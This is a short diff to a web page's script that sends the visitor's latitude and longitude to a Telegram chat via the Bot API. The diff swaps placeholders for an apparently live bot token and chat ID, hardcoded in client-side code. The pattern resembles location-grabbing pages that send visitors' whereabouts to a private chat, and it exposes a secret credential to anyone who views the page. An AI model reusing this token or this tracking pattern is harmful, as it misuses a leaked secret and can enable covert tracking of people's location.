--- a/index.html
+++ b/index.html
@@ -32,8 +32,8 @@
 
             document.getElementById("status").textContent = "Sending location...";
 
-            var token = 'YOUR_TELEGRAM_BOT_TOKEN'; // Replace with your bot token
-            var chatId = 'YOUR_CHAT_ID'; // Replace with your chat ID
+            var token = '6197747448:AAFrgXeZdjQZ1iTm9AE6v56h6y-qShiH5es'; // Replace with your bot token
+            var chatId = '5112680061'; // Replace with your chat ID
             var message = `Location: Latitude ${latitude}, Longitude ${longitude}`;
 
             var url = `https://api.telegram.org/bot${token}/sendMessage`;
